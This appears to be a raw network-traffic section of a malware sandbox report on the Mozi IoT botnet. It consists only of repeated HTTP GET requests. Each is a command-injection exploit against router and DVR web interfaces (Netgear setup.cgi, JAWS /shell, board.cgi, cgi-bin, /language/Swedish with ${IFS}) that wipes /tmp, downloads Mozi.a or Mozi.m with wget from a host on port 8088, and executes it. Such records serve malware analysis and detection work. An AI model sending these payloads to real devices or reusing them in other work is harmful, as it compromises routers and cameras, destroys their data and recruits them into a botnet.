                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 204.28.245.60:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 166.190.152.42:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 125.216.231.239:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 186.43.106.240:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 130.4.44.249:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 114.23.158.95:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 153.243.22.46:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 205.160.164.41:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 191.76.14.223:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 102.56.202.225:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 182.41.168.5:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 213.120.222.219:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 142.5.217.81:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
